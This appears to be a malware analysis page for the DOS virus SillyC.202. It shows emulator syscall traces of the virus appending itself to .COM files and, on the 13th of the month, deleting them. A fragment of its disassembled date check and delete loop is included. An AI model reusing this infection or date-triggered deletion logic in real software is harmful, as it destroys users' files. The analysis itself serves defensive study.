Sample viewer

vx.netlux.org/Virus.DOS.SillyC.202

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:11:12.231144145Z 26 PC: 12a50 | Set disk transfer address
2018-12-17T22:11:12.234262169Z 42 PC: 12a54 | Get date 0x12a54: cmp dl, 0xd
0x12a57: je 0x12a5d
0x12a59: cmp al, 0
0x12a5b: jne 0x12a76
0x12a5d: lea dx, word ptr [0x18f]
0x12a61: call 0x12aed
0x12a64: jb 0x12ad3
0x12a66: mov dx, di
0x12a68: mov ah, 0x41
0x12a6a: int 0x21
0x12a6c: lea dx, word ptr [0x18f]
0x12a70: mov ah, 0x4f
0x12a72: int 0x21
0x12a74: jae 0x12a66
0x12a76: lea dx, word ptr [0x1a7]
0x12a7a: call 0x12aed
0x12a7d: jb 0x12ad3
0x12a7f: mov dx, di
0x12a81: mov ax, 0x3d02
0x12a84: int 0x21
2018-12-17T22:11:12.237743046Z 78 PC: 12b05 | Find first file
2018-12-17T22:11:12.245970019Z 61 PC: 12a86 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:11:12.254158279Z 87 PC: 12a8f | Get or set file date and time
2018-12-17T22:11:12.25846593Z 63 PC: 12b05 | Read file or device (Read 202 bytes on handle 5)
2018-12-17T22:11:12.266326961Z 66 PC: 12b05 | Move file pointer
2018-12-17T22:11:12.267918519Z 64 PC: 12b05 | Write file or device (Write 202 bytes on handle 5)
2018-12-17T22:11:12.282816457Z 66 PC: 12b05 | Move file pointer
2018-12-17T22:11:12.284420792Z 64 PC: 12b05 | Write file or device (Write 202 bytes on handle 5)
2018-12-17T22:11:12.292516361Z 87 PC: 12abf | Get or set file date and time
2018-12-17T22:11:12.294733726Z 62 PC: 12ac3 | Close file
2018-12-17T22:11:12.302611157Z 79 PC: 12acb | Find next file
2018-12-17T22:11:12.305299451Z 61 PC: 12a86 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:11:12.312569461Z 87 PC: 12a8f | Get or set file date and time
2018-12-17T22:11:12.314172097Z 63 PC: 12b05 | Read file or device (Read 202 bytes on handle 5)
2018-12-17T22:11:12.320417714Z 66 PC: 12b05 | Move file pointer
2018-12-17T22:11:12.322461671Z 64 PC: 12b05 | Write file or device (Write 202 bytes on handle 5)
2018-12-17T22:11:12.325497343Z 66 PC: 12b05 | Move file pointer
2018-12-17T22:11:12.327330701Z 64 PC: 12b05 | Write file or device (Write 202 bytes on handle 5)
2018-12-17T22:11:12.330941707Z 87 PC: 12abf | Get or set file date and time
2018-12-17T22:11:12.332734792Z 62 PC: 12ac3 | Close file
2018-12-17T22:11:12.340739398Z 79 PC: 12acb | Find next file
2018-12-17T22:11:12.344955587Z 61 PC: 12a86 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:11:12.351609628Z 87 PC: 12a8f | Get or set file date and time
2018-12-17T22:11:12.353231941Z 63 PC: 12b05 | Read file or device (Read 202 bytes on handle 5)
2018-12-17T22:11:12.362552496Z 66 PC: 12b05 | Move file pointer
2018-12-17T22:11:12.369356317Z 64 PC: 12b05 | Write file or device (Write 202 bytes on handle 5)
2018-12-17T22:11:12.372744118Z 66 PC: 12b05 | Move file pointer
2018-12-17T22:11:12.375374498Z 64 PC: 12b05 | Write file or device (Write 202 bytes on handle 5)
2018-12-17T22:11:12.37807232Z 87 PC: 12abf | Get or set file date and time
2018-12-17T22:11:12.379551692Z 62 PC: 12ac3 | Close file
2018-12-17T22:11:12.387844722Z 79 PC: 12acb | Find next file
2018-12-17T22:11:12.390607358Z 61 PC: 12a86 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:11:12.397089601Z 87 PC: 12a8f | Get or set file date and time
2018-12-17T22:11:12.399434559Z 63 PC: 12b05 | Read file or device (Read 202 bytes on handle 5)
2018-12-17T22:11:12.405938394Z 66 PC: 12b05 | Move file pointer
2018-12-17T22:11:12.407091938Z 64 PC: 12b05 | Write file or device (Write 202 bytes on handle 5)
2018-12-17T22:11:12.409517721Z 66 PC: 12b05 | Move file pointer
2018-12-17T22:11:12.413407147Z 64 PC: 12b05 | Write file or device (Write 202 bytes on handle 5)
2018-12-17T22:11:12.415729823Z 87 PC: 12abf | Get or set file date and time
2018-12-17T22:11:12.419494717Z 62 PC: 12ac3 | Close file
2018-12-17T22:11:12.427485983Z 79 PC: 12acb | Find next file
2018-12-17T22:11:12.430187348Z 61 PC: 12a86 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:11:12.437735345Z 87 PC: 12a8f | Get or set file date and time
2018-12-17T22:11:12.439352368Z 63 PC: 12b05 | Read file or device (Read 202 bytes on handle 5)
2018-12-17T22:11:12.445810925Z 66 PC: 12b05 | Move file pointer
2018-12-17T22:11:12.448623896Z 64 PC: 12b05 | Write file or device (Write 202 bytes on handle 5)
2018-12-17T22:11:12.452016218Z 66 PC: 12b05 | Move file pointer
2018-12-17T22:11:12.453866412Z 64 PC: 12b05 | Write file or device (Write 202 bytes on handle 5)
2018-12-17T22:11:12.457391585Z 87 PC: 12abf | Get or set file date and time
2018-12-17T22:11:12.459026557Z 62 PC: 12ac3 | Close file
2018-12-17T22:11:12.466800125Z 79 PC: 12acb | Find next file
2018-12-17T22:11:12.469968792Z 61 PC: 12a86 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:11:12.476993631Z 87 PC: 12a8f | Get or set file date and time
2018-12-17T22:11:12.478411149Z 63 PC: 12b05 | Read file or device (Read 202 bytes on handle 5)
2018-12-17T22:11:12.486266727Z 66 PC: 12b05 | Move file pointer
2018-12-17T22:11:12.487921861Z 64 PC: 12b05 | Write file or device (Write 202 bytes on handle 5)
2018-12-17T22:11:12.497242861Z 66 PC: 12b05 | Move file pointer
2018-12-17T22:11:12.498599292Z 64 PC: 12b05 | Write file or device (Write 202 bytes on handle 5)
2018-12-17T22:11:12.505423669Z 87 PC: 12abf | Get or set file date and time
2018-12-17T22:11:12.507200907Z 62 PC: 12ac3 | Close file
2018-12-17T22:11:12.515070358Z 79 PC: 12acb | Find next file
2018-12-17T22:11:12.517274011Z 61 PC: 12a86 | Open file (Filename = 'PAH.COM')
2018-12-17T22:11:12.523560222Z 87 PC: 12a8f | Get or set file date and time
2018-12-17T22:11:12.524806701Z 63 PC: 12b05 | Read file or device (Read 202 bytes on handle 5)
2018-12-17T22:11:12.531373982Z 66 PC: 12b05 | Move file pointer
2018-12-17T22:11:12.532665634Z 64 PC: 12b05 | Write file or device (Write 202 bytes on handle 5)
2018-12-17T22:11:12.535264926Z 66 PC: 12b05 | Move file pointer
2018-12-17T22:11:12.537472553Z 64 PC: 12b05 | Write file or device (Write 202 bytes on handle 5)
2018-12-17T22:11:12.540109629Z 87 PC: 12abf | Get or set file date and time
2018-12-17T22:11:12.541750036Z 62 PC: 12ac3 | Close file
2018-12-17T22:11:12.549500913Z 79 PC: 12acb | Find next file

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2369,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:45:36.397455281Z 26 PC: 12a50 | Set disk transfer address
2018-12-25T11:45:36.410508346Z 42 PC: 12a54 | Get date 0x12a54: cmp dl, 0xd
0x12a57: je 0x12a5d
0x12a59: cmp al, 0
0x12a5b: jne 0x12a76
0x12a5d: lea dx, word ptr [0x18f]
0x12a61: call 0x12aed
0x12a64: jb 0x12ad3
0x12a66: mov dx, di
0x12a68: mov ah, 0x41
0x12a6a: int 0x21
0x12a6c: lea dx, word ptr [0x18f]
0x12a70: mov ah, 0x4f
0x12a72: int 0x21
0x12a74: jae 0x12a66
0x12a76: lea dx, word ptr [0x1a7]
0x12a7a: call 0x12aed
0x12a7d: jb 0x12ad3
0x12a7f: mov dx, di
0x12a81: mov ax, 0x3d02
0x12a84: int 0x21
2018-12-25T11:45:36.412539697Z 78 PC: 12b05 | Find first file
2018-12-25T11:45:36.418331184Z 61 PC: 12a86 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:45:36.425096667Z 87 PC: 12a8f | Get or set file date and time
2018-12-25T11:45:36.426547627Z 63 PC: 12b05 | Read file or device (See above)
2018-12-25T11:45:36.432598611Z 66 PC: 12b05 | Move file pointer (See above)
2018-12-25T11:45:36.434800494Z 64 PC: 12b05 | Write file or device (See above)
2018-12-25T11:45:37.112532273Z 66 PC: 12b05 | Move file pointer (See above)
2018-12-25T11:45:37.114158131Z 64 PC: 12b05 | Write file or device (See above)
2018-12-25T11:45:37.121343789Z 87 PC: 12abf | Get or set file date and time
2018-12-25T11:45:37.123168966Z 62 PC: 12ac3 | Close file
2018-12-25T11:45:37.131071661Z 79 PC: 12acb | Find next file
2018-12-25T11:45:37.134173659Z 61 PC: 12a86 | Open file (See above)
2018-12-25T11:45:37.138396704Z 87 PC: 12a8f | Get or set file date and time (See above)
2018-12-25T11:45:37.13958937Z 63 PC: 12b05 | Read file or device (See above)
2018-12-25T11:45:37.144301088Z 66 PC: 12b05 | Move file pointer (See above)
2018-12-25T11:45:37.145472266Z 64 PC: 12b05 | Write file or device (See above)
2018-12-25T11:45:37.147241922Z 66 PC: 12b05 | Move file pointer (See above)
2018-12-25T11:45:37.149134085Z 64 PC: 12b05 | Write file or device (See above)
2018-12-25T11:45:37.150934825Z 87 PC: 12abf | Get or set file date and time (See above)
2018-12-25T11:45:37.152052277Z 62 PC: 12ac3 | Close file (See above)
2018-12-25T11:45:37.156937771Z 79 PC: 12acb | Find next file (See above)
2018-12-25T11:45:37.159757257Z 61 PC: 12a86 | Open file (See above)
2018-12-25T11:45:37.164062921Z 87 PC: 12a8f | Get or set file date and time (See above)
2018-12-25T11:45:37.165308723Z 63 PC: 12b05 | Read file or device (See above)
2018-12-25T11:45:37.171775435Z 66 PC: 12b05 | Move file pointer (See above)
2018-12-25T11:45:37.173021347Z 64 PC: 12b05 | Write file or device (See above)
2018-12-25T11:45:37.175554083Z 66 PC: 12b05 | Move file pointer (See above)
2018-12-25T11:45:37.1781141Z 64 PC: 12b05 | Write file or device (See above)
2018-12-25T11:45:37.180734293Z 87 PC: 12abf | Get or set file date and time (See above)
2018-12-25T11:45:37.182068907Z 62 PC: 12ac3 | Close file (See above)
2018-12-25T11:45:37.202790635Z 79 PC: 12acb | Find next file (See above)
2018-12-25T11:45:37.205215748Z 61 PC: 12a86 | Open file (See above)
2018-12-25T11:45:37.211506903Z 87 PC: 12a8f | Get or set file date and time (See above)
2018-12-25T11:45:37.213527532Z 63 PC: 12b05 | Read file or device (See above)
2018-12-25T11:45:37.220755757Z 66 PC: 12b05 | Move file pointer (See above)
2018-12-25T11:45:37.222161575Z 64 PC: 12b05 | Write file or device (See above)
2018-12-25T11:45:37.226862269Z 66 PC: 12b05 | Move file pointer (See above)
2018-12-25T11:45:37.22864663Z 64 PC: 12b05 | Write file or device (See above)
2018-12-25T11:45:37.231364144Z 87 PC: 12abf | Get or set file date and time (See above)
2018-12-25T11:45:37.233807975Z 62 PC: 12ac3 | Close file (See above)
2018-12-25T11:45:37.244821492Z 79 PC: 12acb | Find next file (See above)
2018-12-25T11:45:37.247386477Z 61 PC: 12a86 | Open file (See above)
2018-12-25T11:45:37.254913571Z 87 PC: 12a8f | Get or set file date and time (See above)
2018-12-25T11:45:37.25649225Z 63 PC: 12b05 | Read file or device (See above)
2018-12-25T11:45:37.263217249Z 66 PC: 12b05 | Move file pointer (See above)
2018-12-25T11:45:37.26544519Z 64 PC: 12b05 | Write file or device (See above)
2018-12-25T11:45:37.268099956Z 66 PC: 12b05 | Move file pointer (See above)
2018-12-25T11:45:37.269454604Z 64 PC: 12b05 | Write file or device (See above)
2018-12-25T11:45:37.272387023Z 87 PC: 12abf | Get or set file date and time (See above)
2018-12-25T11:45:37.273898036Z 62 PC: 12ac3 | Close file (See above)
2018-12-25T11:45:37.28086536Z 79 PC: 12acb | Find next file (See above)
2018-12-25T11:45:37.28432602Z 61 PC: 12a86 | Open file (See above)
2018-12-25T11:45:37.290625129Z 87 PC: 12a8f | Get or set file date and time (See above)
2018-12-25T11:45:37.291969301Z 63 PC: 12b05 | Read file or device (See above)
2018-12-25T11:45:37.298983077Z 66 PC: 12b05 | Move file pointer (See above)
2018-12-25T11:45:37.300407675Z 64 PC: 12b05 | Write file or device (See above)
2018-12-25T11:45:37.308674517Z 66 PC: 12b05 | Move file pointer (See above)
2018-12-25T11:45:37.310605458Z 64 PC: 12b05 | Write file or device (See above)
2018-12-25T11:45:37.318908304Z 87 PC: 12abf | Get or set file date and time (See above)
2018-12-25T11:45:37.320662298Z 62 PC: 12ac3 | Close file (See above)
2018-12-25T11:45:37.329804919Z 79 PC: 12acb | Find next file (See above)
2018-12-25T11:45:37.332294987Z 61 PC: 12a86 | Open file (See above)
2018-12-25T11:45:37.338545984Z 87 PC: 12a8f | Get or set file date and time (See above)
2018-12-25T11:45:37.340286503Z 63 PC: 12b05 | Read file or device (See above)
2018-12-25T11:45:37.348931205Z 66 PC: 12b05 | Move file pointer (See above)
2018-12-25T11:45:37.354241506Z 64 PC: 12b05 | Write file or device (See above)
2018-12-25T11:45:37.35773087Z 66 PC: 12b05 | Move file pointer (See above)
2018-12-25T11:45:37.359165816Z 64 PC: 12b05 | Write file or device (See above)
2018-12-25T11:45:37.361764029Z 87 PC: 12abf | Get or set file date and time (See above)
2018-12-25T11:45:37.364038966Z 62 PC: 12ac3 | Close file (See above)
2018-12-25T11:45:37.371457492Z 79 PC: 12acb | Find next file (See above)

{"DateBased":true,"Day":6,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2369,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:45:36.620367762Z 26 PC: 12a50 | Set disk transfer address
2018-12-25T11:45:36.621870388Z 42 PC: 12a54 | Get date 0x12a54: cmp dl, 0xd
0x12a57: je 0x12a5d
0x12a59: cmp al, 0
0x12a5b: jne 0x12a76
0x12a5d: lea dx, word ptr [0x18f]
0x12a61: call 0x12aed
0x12a64: jb 0x12ad3
0x12a66: mov dx, di
0x12a68: mov ah, 0x41
0x12a6a: int 0x21
0x12a6c: lea dx, word ptr [0x18f]
0x12a70: mov ah, 0x4f
0x12a72: int 0x21
0x12a74: jae 0x12a66
0x12a76: lea dx, word ptr [0x1a7]
0x12a7a: call 0x12aed
0x12a7d: jb 0x12ad3
0x12a7f: mov dx, di
0x12a81: mov ax, 0x3d02
0x12a84: int 0x21
2018-12-25T11:45:36.624039329Z 78 PC: 12b05 | Find first file
2018-12-25T11:45:36.629849599Z 65 PC: 12a6c | Delete file (Filename = 'SLEEP.COM')
2018-12-25T11:45:37.11918535Z 79 PC: 12a74 | Find next file
2018-12-25T11:45:37.121907904Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T11:45:37.133046766Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T11:45:37.135988156Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T11:45:37.14939373Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T11:45:37.152065864Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T11:45:37.163878372Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T11:45:37.166746716Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T11:45:37.177991209Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T11:45:37.180571285Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T11:45:37.192276261Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T11:45:37.194281612Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T11:45:37.202929279Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T11:45:37.206780898Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T11:45:37.22071245Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T11:45:37.223261168Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T11:45:37.235030376Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T11:45:37.236822669Z 78 PC: 12b05 | Find first file (See above)

{"DateBased":true,"Day":13,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2369,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:45:36.652479186Z 26 PC: 12a50 | Set disk transfer address
2018-12-25T11:45:36.655091531Z 42 PC: 12a54 | Get date 0x12a54: cmp dl, 0xd
0x12a57: je 0x12a5d
0x12a59: cmp al, 0
0x12a5b: jne 0x12a76
0x12a5d: lea dx, word ptr [0x18f]
0x12a61: call 0x12aed
0x12a64: jb 0x12ad3
0x12a66: mov dx, di
0x12a68: mov ah, 0x41
0x12a6a: int 0x21
0x12a6c: lea dx, word ptr [0x18f]
0x12a70: mov ah, 0x4f
0x12a72: int 0x21
0x12a74: jae 0x12a66
0x12a76: lea dx, word ptr [0x1a7]
0x12a7a: call 0x12aed
0x12a7d: jb 0x12ad3
0x12a7f: mov dx, di
0x12a81: mov ax, 0x3d02
0x12a84: int 0x21
2018-12-25T11:45:36.663550061Z 78 PC: 12b05 | Find first file
2018-12-25T11:45:36.670268582Z 65 PC: 12a6c | Delete file (Filename = 'SLEEP.COM')
2018-12-25T11:45:36.689962128Z 79 PC: 12a74 | Find next file
2018-12-25T11:45:36.693612647Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T11:45:36.706000406Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T11:45:36.70921463Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T11:45:36.722239286Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T11:45:36.725364159Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T11:45:36.737203126Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T11:45:36.740974524Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T11:45:36.756579623Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T11:45:36.759508424Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T11:45:36.772544214Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T11:45:36.776708866Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T11:45:36.788756725Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T11:45:36.792147127Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T11:45:36.80449044Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T11:45:36.807552583Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T11:45:36.819758169Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T11:45:36.823233161Z 78 PC: 12b05 | Find first file (See above)